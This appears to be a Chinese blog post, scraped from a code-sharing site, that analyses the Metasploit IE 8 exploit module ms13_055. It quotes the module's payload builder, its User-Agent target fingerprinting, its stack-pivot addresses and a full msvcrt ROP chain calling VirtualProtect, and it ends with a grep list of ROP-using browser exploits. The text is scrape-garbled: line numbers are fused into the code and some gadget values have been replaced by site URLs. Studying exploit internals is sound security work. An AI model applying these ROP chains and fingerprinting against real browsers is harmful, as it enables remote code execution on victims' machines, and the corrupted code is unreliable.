首页 > 代码库 > ms13_055 metasploit

ms13_055 metasploit

111   def get_payload(t)112     if t[‘Rop‘] == :msvcrt113       print_status("Using msvcrt ROP")114       esp_align = "\x81\xc4\x54\xf2\xff\xff"115       rop_dll = ‘msvcrt‘116       opts    = {‘target‘=>‘xp‘}117     else118       print_status("Using JRE ROP")119       esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000120       rop_dll = ‘java‘121       opts    = {}122     end

  

daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s inte
l00000000 81 C4 54 F2 FF FF add esp, 0xFFFFF254

  

daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel00000000 81 EC F0 D8 FF FF            	sub	esp, 0xFFFFD8F0

  

esp_align代表的汇编语句的作用是对齐esp,即栈指针。


 

 87   def get_target(agent) 88     return target if target.name != ‘Automatic‘ 89  90     nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ‘‘ 91     ie = agent.scan(/MSIE (\d)/).flatten[0] || ‘‘ 92  93     ie_name = "IE #{ie}" 94  95     case nt 96     when ‘5.1‘ 97       os_name = ‘Windows XP SP3‘ 98     when ‘6.1‘ 99       os_name = ‘Windows 7‘100     end101 102     targets.each do |t|103       if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))104         return t105       end106     end107 108     nil109   end

  

188   def on_request_uri(cli, request)189     agent = request.headers[‘User-Agent‘]190     t = get_target(agent)

  

当远程的网页客户端发出HTTP请求页面时,get_target会根据请求Header中的User-Agent信息来了解客户端操作系统以及浏览器的版本情况,然后根据预设的情况来

返回与版本相关的数据

 52       ‘Targets‘        => 53         [ 54           [ ‘Automatic‘, {} ], 55           [ 56             ‘IE 8 on Windows XP SP3‘, 57             { 58               ‘Rop‘   => :msvcrt, 59               ‘Pivot‘ => 0x77c15ed5, # xchg eax, esp; ret 60               ‘Align‘ => 0x77c4d801  # add esp, 0x2c; ret 61             } 62           ], 63           [ 64             ‘IE 8 on Windows 7‘, 65             { 66               ‘Rop‘   => :jre, 67               ‘Pivot‘ => 0x7c348b05, # xchg eax, esp; ret 68               ‘Align‘ => 0x7C3445F8  # add esp, 0x2c; ret 69             } 70           ] 71         ],

  

如果当前的系统不支持,就会返回404页面。


 

111   def get_payload(t)112     if t[‘Rop‘] == :msvcrt113       print_status("Using msvcrt ROP")114       esp_align = "\x81\xc4\x54\xf2\xff\xff"115       rop_dll = ‘msvcrt‘116       opts    = {‘target‘=>‘xp‘}117     else118       print_status("Using JRE ROP")119       esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000120       rop_dll = ‘java‘121       opts    = {}122     end123 124     p = esp_align + payload.encoded + rand_text_alpha(12000)125     generate_rop_payload(rop_dll, p, opts)126   end

  

generate_rop_payload

 77   def generate_rop_payload(rop, payload, opts={}) 78     nop      = opts[‘nop‘]      || nil 79     badchars = opts[‘badchars‘] || ‘‘ 80     pivot    = opts[‘pivot‘]    || ‘‘ 81     target   = opts[‘target‘]   || ‘‘ 82     base     = opts[‘base‘]     || nil 83  84     rop = select_rop(rop, {‘target‘=>target, ‘base‘=>base}) 85     # Replace the reserved words with actual gadgets 86     rop = rop.map {|e| 87       if e == :nop 88         sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090 89       elsif e == :junk 90         Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i 91       elsif e == :size 92         payload.length 93       elsif e == :unsafe_negate_size 94         get_unsafe_size(payload.length) 95       elsif e == :safe_negate_size 96         get_safe_size(payload.length) 97       else 98         e 99       end100     }.pack("V*")101 102     raise RuntimeError, "No ROP chain generated successfully" if rop.empty?103 104     return pivot + rop + payload105   end

  

会从data目录下查找定义好的[module].xml的文件,然后将gadgets中的宏定义展开,然后与pivot + gadgets + payload返回。

  3 <rop>  4         <compatibility>  5                 <target>WINDOWS XP SP2</target>  6                 <target>WINDOWS XP SP3</target>  7         </compatibility>  8   9         <gadgets base="0x77c10000"> 10                 <gadget offset="0x0002b860">POP EAX # RETN</gadget> 11                 <gadget value="http://www.mamicode.com/safe_negate_size">0xFFFFFBFF -> ebx</gadget> 12                 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget> 13                 <gadget value="http://www.mamicode.com/junk">JUNK</gadget> 14                 <gadget offset="0x0001362c">POP EBX # RETN</gadget> 15                 <gadget offset="0x0004d9bb">Writable location</gadget> 16                 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget> 17                 <gadget offset="0x00040d13">POP EDX # RETN</gadget> 18                 <gadget value="http://www.mamicode.com/0xFFFFFFC0">0xFFFFFFC0-> edx</gadget> 19                 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget> 20                 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget> 21                 <gadget value="http://www.mamicode.com/junk">JUNK</gadget> 22                 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget> 23                 <gadget offset="0x0002ee15">POP EBP # RETN</gadget> 24                 <gadget offset="0x0002ee15">skip 4 bytes</gadget> 25                 <gadget offset="0x0002eeef">POP ECX # RETN</gadget> 26                 <gadget offset="0x0004d9bb">Writable location</gadget> 27                 <gadget offset="0x0001a88c">POP EDI # RETN</gadget> 28                 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget> 29                 <gadget offset="0x0002a184">POP ESI # RETN</gadget> 30                 <gadget offset="0x0001aacc">JMP [EAX]</gadget> 31                 <gadget offset="0x0002b860">POP EAX # RETN</gadget> 32                 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget> 33                 <gadget offset="0x00002df9">PUSHAD # RETN</gadget> 34                 <gadget offset="0x00025459">ptr to ‘push esp #  ret</gadget> 35         </gadgets> 36 </rop>

  


 

在查找Windows下Browser相关的ROP漏洞

daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -nadobe_flash_mp4_cprt.rb:148:    code = generate_rop_payload(rop_name, code, {‘target‘=>rop_target})adobe_flash_otf_font.rb:100:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.257‘, ‘pivot‘=>pivot})adobe_flash_otf_font.rb:110:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.265‘, ‘pivot‘=>pivot})adobe_flash_otf_font.rb:120:      p = generate_rop_payload(‘flash‘, payload.encoded, {‘target‘=>‘11.3.300.268‘, ‘pivot‘=>pivot})adobe_flash_otf_font.rb:130:      p = generate_rop_payload(‘java‘, payload.encoded, {‘pivot‘=>pivot})adobe_flashplayer_flash10o.rb:194:      p = generate_rop_payload(‘java‘, payload.encoded)adobe_flash_rtmp.rb:135:    code << generate_rop_payload(‘msvcrt‘, p, {‘target‘=>‘xp‘})adobe_toolbutton.rb:77:    rop_10 = Rex::Text.to_unescape(generate_rop_payload(‘reader‘, ‘‘, { ‘target‘ => ‘10‘ }))adobe_toolbutton.rb:78:    rop_11 = Rex::Text.to_unescape(generate_rop_payload(‘reader‘, ‘‘, { ‘target‘ => ‘11‘ }))aladdin_choosefilepath_bof.rb:147:      p = generate_rop_payload(‘msvcrt‘, get_payload(cli, target_info), {‘target‘=>‘xp‘})apple_quicktime_mime_type.rb:153:      code = generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘})apple_quicktime_rdrf.rb:65:    p = generate_rop_payload(‘msvcrt‘, alignment + payload.encoded, {‘target‘=>‘xp‘})crystal_reports_printcontrol.rb:178:    rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘ => [t[‘Pivot‘]].pack("V")})hp_loadrunner_writefilebinary.rb:207:      rop_payload = fake_object + generate_rop_payload(‘java‘, code)#, {‘pivot‘=>stack_pivot})ie_cbutton_uaf.rb:148:        rop_payload = generate_rop_payload(‘msvcrt‘, msvcrt_align + code, {‘target‘=>‘xp‘})ie_cbutton_uaf.rb:150:        rop_payload = generate_rop_payload(‘msvcrt‘, msvcrt_align + code, {‘target‘=>‘2003‘})ie_cbutton_uaf.rb:153:      rop_payload = generate_rop_payload(‘java‘, java_align + code)ie_cgenericelement_uaf.rb:126:        rop_payload = generate_rop_payload(‘msvcrt‘, align+p, {‘target‘=>‘xp‘})ie_cgenericelement_uaf.rb:128:        rop_payload = generate_rop_payload(‘msvcrt‘, align+p, {‘target‘=>‘2003‘})ie_cgenericelement_uaf.rb:136:      rop_payload = generate_rop_payload(‘java‘, code)ie_execcommand_uaf.rb:139:      rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})ie_execcommand_uaf.rb:158:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})ie_setmousecapture_uaf.rb:98:      rop = generate_rop_payload(‘hxds‘, code, { ‘target‘=>‘2007‘ })ie_setmousecapture_uaf.rb:112:      rop = generate_rop_payload(‘hxds‘, code, { ‘target‘=>‘2010‘ })indusoft_issymbol_internationalseparator.rb:219:      rop_payload = generate_rop_payload(‘msvcrt‘, code,  {‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})indusoft_issymbol_internationalseparator.rb:231:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})inotes_dwa85w_bof.rb:204:      rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘target‘=>‘xp‘})#{‘pivot‘=>stack_pivot, ‘target‘=>‘xp‘})mozilla_firefox_onreadystatechange.rb:108:    code << generate_rop_payload(‘msvcrt‘, stack_pivot + payload.encoded, {‘target‘=>‘xp‘})mozilla_firefox_xmlserializer.rb:110:    code << generate_rop_payload(‘msvcrt‘, stack_pivot + payload.encoded, {‘target‘=>‘xp‘})ms10_002_ie_object.rb:248:      rop_payload = generate_rop_payload(‘msvcrt‘, p, {‘target‘=>‘xp‘})ms10_002_ie_object.rb:250:      rop_payload = generate_rop_payload(‘java‘, p)ms11_050_mshtml_cobjectelement.rb:182:      rop_payload = generate_rop_payload(‘java‘, p)ms11_081_option.rb:137:      rop_payload = generate_rop_payload(‘msvcrt‘, "", {‘target‘=>‘xp‘})ms11_081_option.rb:144:      rop_payload = generate_rop_payload(‘java‘, ‘‘)ms12_004_midi.rb:519:    generate_rop_payload(‘msvcrt‘, p, {‘pivot‘=>padding, ‘target‘=>‘xp‘})ms12_037_same_id.rb:133:      rop = generate_rop_payload(‘msvcrt‘, ‘‘, {‘target‘=>‘xp‘, ‘pivot‘=>pivot})ms12_037_same_id.rb:137:      rop = generate_rop_payload(‘java‘, ‘‘, {‘pivot‘=>pivot})ms13_009_ie_slayoutrun_uaf.rb:128:      rop_payload = generate_rop_payload(‘msvcrt‘, "", {‘target‘=>‘xp‘})ms13_037_svg_dashstyle.rb:218:      rop_payload = generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})ms13_055_canchor.rb:125:    generate_rop_payload(rop_dll, p, opts)ms13_059_cflatmarkuppointer.rb:120:    generate_rop_payload(‘java‘, code, {‘pivot‘=>stack_pivot})ms13_069_caret.rb:97:    p << generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘})ms13_080_cdisplaypointer.rb:157:      rop_payload = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2007‘, ‘pivot‘=>pivot})ms13_080_cdisplaypointer.rb:174:      rop_payload = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2010‘, ‘pivot‘=>pivot})ms13_080_cdisplaypointer.rb:186:        rop_payload = generate_rop_payload(‘msvcrt‘, payload.encoded, {‘target‘=>‘xp‘, ‘pivot‘=>pivot})ms13_080_cdisplaypointer.rb:197:        rop_payload = generate_rop_payload(‘java‘, payload.encoded, {‘pivot‘=>pivot})ms13_090_cardspacesigninhelper.rb:108:    rop_payload = generate_rop_payload(‘msvcrt‘, get_payload(cli, target_info), {‘target‘=>‘xp‘, ‘pivot‘ => stack_pivot})ms14_012_textrange.rb:85:    p = generate_rop_payload(‘hxds‘, payload.encoded, {‘target‘=>‘2010‘, ‘pivot‘=>setup})msxml_get_definition_code_exec.rb:189:        rop = generate_rop_payload(‘msvcrt‘,‘‘,{‘target‘=>‘xp‘, ‘pivot‘=>adjust})msxml_get_definition_code_exec.rb:193:        rop = generate_rop_payload(‘java‘,‘‘,{‘pivot‘=>adjust})novell_groupwise_gwcls1_actvx.rb:207:        rop_payload = generate_rop_payload(‘msvcrt‘, ‘‘, ‘target‘=>‘xp‘) # Mapped at 0x0c0c07eanovell_groupwise_gwcls1_actvx.rb:217:        rop_payload = generate_rop_payload(‘java‘, ‘‘) # Mapped at 0x0c0c07eantr_activex_check_bof.rb:270:        rop_payload = generate_rop_payload(‘msvcrt‘, code, {‘target‘=>‘xp‘})ntr_activex_check_bof.rb:274:        rop_payload = generate_rop_payload(‘java‘, code)quickr_qp2_bof.rb:202:      rop_payload = generate_rop_payload(‘java‘, code)#, {‘pivot‘=>stack_pivot})siemens_solid_edge_selistctrlx.rb:398:    return generate_rop_payload(‘msvcrt‘, payload.encoded, {‘pivot‘=> fake_memory, ‘target‘=>‘xp‘})vlc_amv.rb:143:      code = generate_rop_payload(‘java‘, payload.encoded)